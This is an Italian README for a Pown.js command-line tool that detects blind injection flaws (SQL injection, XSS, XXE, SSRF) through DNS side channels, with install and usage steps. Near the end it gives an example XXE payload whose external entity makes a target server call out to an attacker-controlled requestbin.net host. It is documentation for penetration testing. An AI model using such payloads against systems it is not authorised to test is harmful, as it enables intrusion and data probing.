
Strumento essenziale per trovare attacchi di blind injection.
Strumento essenziale per individuare attacchi di injection ciechi utilizzando canali laterali DNS.
Questo strumento fa parte dell'iniziativa open source di secapps.com.
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
NB: Questo strumento sfrutta il servizio http://requestbin.net. Le versioni future utilizzeranno un'infrastruttura dedicata e costruita su misura.
Questo strumento è pensato per essere utilizzato come parte di Pown.js ma può essere invocato separatamente come strumento indipendente.
Installa prima Pown come al solito:
$ npm install -g pown@latest
Invoca direttamente da Pown:
$ pown duct
Altrimenti, installa questo modulo localmente dalla radice del tuo progetto:
$ npm install @pown/duct --save
Una volta fatto, invoca pown cli:
$ ./node_modules/.bin/pown-cli duct
Puoi anche usare pown globale per invocare lo strumento localmente:
$ POWN_ROOT=. pown duct
pown duct <command>
Side-channel attack enabler
Commands:
pown duct dns DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
pown duct dnspown duct dns
DNS ducting
Options:
--version Show version number [boolean]
--help Show help [boolean]
--channel Restore channel [string]
--output Output format [string] [choices: "string", "hexdump", "json"] [default: "string"]
Ci sono casi in cui dobbiamo eseguire un attacco come SQL injection, XSS, XXE o SSRF ma l'applicazione target non fornisce alcuna indicazione di essere vulnerabile. Un modo per essere sicuri se una vulnerabilità è presente è provare a iniettare un vettore di attacco valido che costringe un resolver DNS a chiedere un dominio controllato. Se la risoluzione ha successo, l'attacco sarà considerato riuscito.
NOTA: Potresti avere familiarità con Burp Collaborator che fornisce un servizio simile per i clienti.
Prima, abbiamo bisogno di un nome DNS usa e getta da risolvere:
$ pown duct dns
screenshot
Usando il DNS fornito, componi il tuo payload. Ad esempio, il seguente potrebbe innescare una risoluzione DNS se è presente una vulnerabilità XXE.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
Se l'attacco ha successo, riceveremo un messaggio nel terminale.
screenshot